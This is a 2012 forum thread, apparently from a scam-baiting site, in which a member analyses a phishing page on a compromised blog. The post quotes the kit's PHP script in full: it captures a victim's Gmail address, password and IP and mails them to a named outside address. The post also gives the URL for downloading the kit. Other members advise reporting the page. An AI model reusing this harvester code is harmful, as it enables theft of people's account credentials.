| Author |
Message |
zzz
Master Baiter
Joined: 14 Jun 2012
Posts: 100
Location: England
|
 Posted:
Wed Jun 27, 2012 9:29 am |
  |
If you open www.jasonsamuel.com only it seems to be a normal blog. However the link I received in a scam email opens a page, saying:
| Quote: |
To access our online secured auction page,
you are required to choose your email address below |
Here is the link:
http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm
It is safe to open it, it asks you to select an email provider, so after clicking the relevant icon a small form appears prompting for email and password.
This is 100% fake and the purpose is to collect email/password information from innocent victims.
I made a quick analysis and was able to download a ZIP file, containing the files hosted behind the malicious link. There are PHP (server-side) files, executed when the user clicks the "Sign in" button. Here is the contents of one of the PHP files:
| Quote: |
<?include 'index_files/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "---------------- XxX *~* HollYd*~* XxX----------------------\n";
$message .= "Gmail: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "----------------------------------Created By HollyD--------------------------------------\n";
$recipient = "mrsjanesmith0909@gmail.com";
$subject = "Gma!l REZ";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: http://www.remax.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?> |
I can clearly see this code is constructing a message, containing the email and password entered by the victim, also the client IP address and some other stupid lines ("Created By HollyD"). Then this message is sent to the following address:
mrsjanesmith0909@gmail.com
If anybody else wants to take a look, open the following link (it is safe):
http://www.jasonsamuel.com/fitness/properties/
It will open a directory contents, download the properties.zip file. The code listed above I extracted from gmail.php - the other php files in fact perform exactly the same thing - sending victim's email and password to this same email address:
mrsjanesmith0909@gmail.com
What should be the course of action? |
_________________
 x4  x 14
"Idiot you are such a moron, article of no commercial value uncircumcised baboon, moron of a frog"
"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"
"You email has been received and from my understanding your email is not well understood." |
|
|
|
|
B8er
boomdazzler
Joined: 16 Feb 2009
Posts: 2279
Location: Praying at the Church of Adobe
|
| Posted:
Wed Jun 27, 2012 10:57 am |
|
It's a phishing site, which we don't deal with here.
The best thing to do would be to report it to one (or more) of the email providers using their report phishing links - give them the http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm page so that they can see it is phishing for email passwords.
They will soon get it closed down. |
_________________
As regard the blanck paper, I wanted to put in the word, but I didn't remember to write the words before we took the pictures. - Pastor Evans
Which one is your name Gender: Male or Mike Hunt - Samson Johnson
 Larry Uzo - Abia state Nigeria>Cotonou>Natitingou>Cotonou>Abia State
 x 138  x 50  x 17  x 5  x 4  x 3  x 3  x 3  x 3  x 3  x 2  x 2  x 2  x 2  x 2  x 2  x 2  x 2            
 x 2 x 54 x 112 - Fake cheques: $4,031,969.31 USD  |
|
|
|
|
zzz
Master Baiter
Joined: 14 Jun 2012
Posts: 100
Location: England
|
| Posted:
Wed Jun 27, 2012 11:07 am |
|
^^^ Reported to Google.
Can a mod close this thread please? |
_________________
x4 x 14
"Idiot you are such a moron, article of no commercial value uncircumcised baboon, moron of a frog"
"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"
"You email has been received and from my understanding your email is not well understood." |
|
|
|
|
woody999
Dormain Reshuffler
Joined: 30 May 2009
Posts: 10322
Location: East of Humptulips
|
| Posted:
Wed Jun 27, 2012 1:02 pm |
|
Marking as n/a and can be moved offline |
_________________
"Why do you tell lies that are not useful" Phillip Okeke
"I lost my assories" Barr. Angus Bu...g
"YOU NEED SOME DOCTOR" Barrister Peter Paul
I dont know who is lieing ,either you or F3lcha1r -
 >11 x 105   
     
         
Peru : sri lanka : USVI : Oman x 3625
x 38  x2 |
|
|
|
|
|
|
|
View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
Please visit this website
** Find out information about your IP address **
|
SmartFeed
